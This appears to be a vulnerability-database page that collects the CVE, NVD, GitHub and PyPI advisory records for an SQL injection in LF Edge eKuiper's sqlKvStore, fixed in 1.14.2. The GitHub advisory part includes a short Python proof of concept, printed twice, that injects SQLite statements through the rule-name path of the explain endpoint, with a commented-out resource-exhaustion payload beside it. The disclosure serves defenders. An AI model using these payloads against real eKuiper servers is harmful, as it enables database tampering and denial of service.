CVE-2024-43406 (GCVE-0-2024-43406)
Vulnerability from cvelistv5 – Published: 2024-08-20 15:00 – Updated: 2024-08-20 17:42
VLAI
Title
LF Edge eKuiper has a SQL Injection in sqlKvStore
Summary
LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.
Severity
8.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/lf-edge/ekuiper/security/advis… | x_refsource_CONFIRM |
| https://github.com/lf-edge/ekuiper/commit/1a9c745… | x_refsource_MISC |
Impacted products
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:lfedge:ekuiper:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ekuiper",
"vendor": "lfedge",
"versions": [
{
"lessThan": "1.14.2",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43406",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-20T17:39:48.544533Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T17:42:14.854Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ekuiper",
"vendor": "lf-edge",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T15:00:06.571Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"name": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
}
],
"source": {
"advisory": "GHSA-r5ph-4jxm-6j9p",
"discovery": "UNKNOWN"
},
"title": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43406",
"datePublished": "2024-08-20T15:00:06.571Z",
"dateReserved": "2024-08-12T18:02:04.966Z",
"dateUpdated": "2024-08-20T17:42:14.854Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-43406",
"date": "2026-06-06",
"epss": "0.01934",
"percentile": "0.83753"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-43406\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-20T15:15:24.070\",\"lastModified\":\"2024-08-26T18:30:13.230\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.\"},{\"lang\":\"es\",\"value\":\"LF Edge eKuiper es un motor liviano de procesamiento de flujo y an\u00e1lisis de datos de IoT que se ejecuta en dispositivos de borde con limitaciones de recursos. Un usuario podr\u00eda utilizar y explotar la inyecci\u00f3n SQL para permitir la ejecuci\u00f3n de consultas SQL maliciosas a trav\u00e9s del m\u00e9todo Get en sqlKvStore. Esta vulnerabilidad se solucion\u00f3 en 1.14.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:lfedge:ekuiper:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.14.2\",\"matchCriteriaId\":\"0E4A9711-7542-4CDD-8D79-616941875FB3\"}]}]}],\"references\":[{\"url\":\"https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-43406\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-20T17:39:48.544533Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:lfedge:ekuiper:*:*:*:*:*:*:*:*\"], \"vendor\": \"lfedge\", \"product\": \"ekuiper\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.14.2\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-20T17:42:10.277Z\"}}], \"cna\": {\"title\": \"LF Edge eKuiper has a SQL Injection in sqlKvStore\", \"source\": {\"advisory\": \"GHSA-r5ph-4jxm-6j9p\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"lf-edge\", \"product\": \"ekuiper\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.14.2\"}]}], \"references\": [{\"url\": \"https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p\", \"name\": \"https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503\", \"name\": \"https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-08-20T15:00:06.571Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-43406\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-20T17:42:14.854Z\", \"dateReserved\": \"2024-08-12T18:02:04.966Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-20T15:00:06.571Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2024-43406
Vulnerability from fkie_nvd - Published: 2024-08-20 15:15 - Updated: 2024-08-26 18:30
Severity
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lfedge:ekuiper:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E4A9711-7542-4CDD-8D79-616941875FB3",
"versionEndExcluding": "1.14.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2."
},
{
"lang": "es",
"value": "LF Edge eKuiper es un motor liviano de procesamiento de flujo y an\u00e1lisis de datos de IoT que se ejecuta en dispositivos de borde con limitaciones de recursos. Un usuario podr\u00eda utilizar y explotar la inyecci\u00f3n SQL para permitir la ejecuci\u00f3n de consultas SQL maliciosas a trav\u00e9s del m\u00e9todo Get en sqlKvStore. Esta vulnerabilidad se solucion\u00f3 en 1.14.2."
}
],
"id": "CVE-2024-43406",
"lastModified": "2024-08-26T18:30:13.230",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-08-20T15:15:24.070",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-R5PH-4JXM-6J9P
Vulnerability from github – Published: 2024-08-20 20:04 – Updated: 2024-08-27 14:27
VLAI
Summary
LF Edge eKuiper has a SQL Injection in sqlKvStore
Details
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
import requests
from urllib.parse import quote
# SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93;
CREATE TABLE test93.pwn (dataz text);
INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
#payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler
res = requests.get(url)
print(res.content)
The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
Severity
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lf-edge/ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43406"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-20T20:04:31Z",
"nvd_published_at": "2024-08-20T15:15:24Z",
"severity": "HIGH"
},
"details": "### Summary\nA user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. \n\n### Details\nI will use explainRuleHandler (\"/rules/{name}/explain\") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.\n\nThe SQL injection can happen in the code:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93\nThe code to accept user input is:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277\n\nThe rule id in the above code can be used to exploit SQL query.\n\nNote that the delete function is also vulnerable:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141\n\n### PoC\n```\nimport requests\nfrom urllib.parse import quote\n\n# SELECT val FROM \u0027xxx\u0027 WHERE key=\u0027%s\u0027;\npayload = f\"\"\"\u0027; ATTACH DATABASE \u0027test93\u0027 AS test93;\nCREATE TABLE test93.pwn (dataz text);\nINSERT INTO test93.pwn (dataz) VALUES (\"sql injection\");--\"\"\"\n\n#payload = \"deadbeef\u0027; SELECT 123=LIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(100000000))));--\"\n\nurl = f\"http://127.0.0.1:9081/rules/{quote(payload,safe=\u0027\u0027)}/explain\" # explainRuleHandler\n\nres = requests.get(url)\nprint(res.content)\n```\n\nThe screenshot shows the malicious SQL query to insert a value:\n\n\nThe screenshot shows the breakpoint of executing the query:\n\n\n\n\n\n### Impact\nSQL Injection vulnerability\n\nThe reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.\n",
"id": "GHSA-r5ph-4jxm-6j9p",
"modified": "2024-08-27T14:27:18Z",
"published": "2024-08-20T20:04:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43406"
},
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
},
{
"type": "PACKAGE",
"url": "https://github.com/lf-edge/ekuiper"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}
PYSEC-2024-72
Vulnerability from pysec - Published: 2024-08-20 15:15 - Updated: 2024-09-18 07:04
VLAI
Details
LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.
Severity
8.8 (High)
Impacted products
| Name | purl | ekuiper | pkg:pypi/ekuiper |
|---|
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ekuiper",
"purl": "pkg:pypi/ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1a9c745649438feaac357d282959687012b65503"
}
],
"repo": "https://github.com/lf-edge/ekuiper",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.0.1.post10035392509",
"0.0.1.post10469657945",
"0.0.1.post1529761077",
"0.0.1.post1640190752",
"0.0.1.post1656951467",
"0.0.1.post1661454534",
"0.0.1.post1707338123",
"0.0.1.post1926549727",
"0.0.1.post2080668443",
"0.0.1.post2238139389",
"0.0.1.post2474892687",
"0.0.1.post2757722354",
"0.0.1.post2910672767",
"0.0.1.post2911616762",
"0.0.1.post3144438011",
"0.0.1.post3239329472",
"0.0.1.post3334144675",
"0.0.1.post3334852441",
"0.0.1.post3410331757",
"0.0.1.post3411321026",
"0.0.1.post3495668732",
"0.0.1.post3545948676",
"0.0.1.post3712037225",
"0.0.1.post3764011091",
"0.0.1.post3936265927",
"0.0.1.post3954842791",
"0.0.1.post4180521993",
"0.0.1.post4435707843",
"0.0.1.post4562358382",
"0.0.1.post4720014312",
"0.0.1.post5010322351",
"0.0.1.post5065833905",
"0.0.1.post5265725915",
"0.0.1.post5484225879",
"0.0.1.post5899657036",
"0.0.1.post6045113904",
"0.0.1.post6144238120",
"0.0.1.post6453363172",
"0.0.1.post6555916078",
"0.0.1.post6820182077",
"0.0.1.post7205401650",
"0.0.1.post7257106983",
"0.0.1.post7404344961",
"0.0.1.post7405252226",
"0.0.1.post7458781898",
"0.0.1.post7797037221",
"0.0.1.post7983964087",
"0.0.1.post8014428509",
"0.0.1.post8150341330",
"0.0.1.post8273699428",
"0.0.1.post8319707068",
"0.0.1.post8478752636",
"0.0.1.post8782256682",
"0.0.1.post8813247801",
"0.0.1.post8829897389",
"0.0.1.post9220188115",
"0.0.1.post9638601298",
"0.0.1.post9690215560",
"0.0.1.post9736400841",
"1.10.0",
"1.10.1",
"1.10.2",
"1.11.0",
"1.11.1",
"1.11.2",
"1.11.3",
"1.11.4",
"1.11.5",
"1.12.0",
"1.12.1",
"1.12.2",
"1.12.3",
"1.12.4",
"1.12.5",
"1.12.6",
"1.12.7",
"1.12.8",
"1.13.0",
"1.13.1",
"1.13.2",
"1.13.3",
"1.13.4",
"1.13.5",
"1.13.6",
"1.14.0",
"1.14.1",
"1.4.0",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.5.0",
"1.5.1",
"1.6.0",
"1.6.1",
"1.6.2",
"1.6.3",
"1.7.0",
"1.7.1",
"1.7.2",
"1.7.3",
"1.7.4",
"1.7.5",
"1.7.6",
"1.8.0",
"1.8.1",
"1.8.2",
"1.9.0",
"1.9.1",
"1.9.2",
"0.0.1.post10592133245",
"0.0.1.post10917063435"
]
}
],
"aliases": [
"CVE-2024-43406",
"GHSA-r5ph-4jxm-6j9p"
],
"details": "LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.",
"id": "PYSEC-2024-72",
"modified": "2024-09-18T07:04:07.042699Z",
"published": "2024-08-20T15:15:00Z",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "ADVISORY",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "FIX",
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…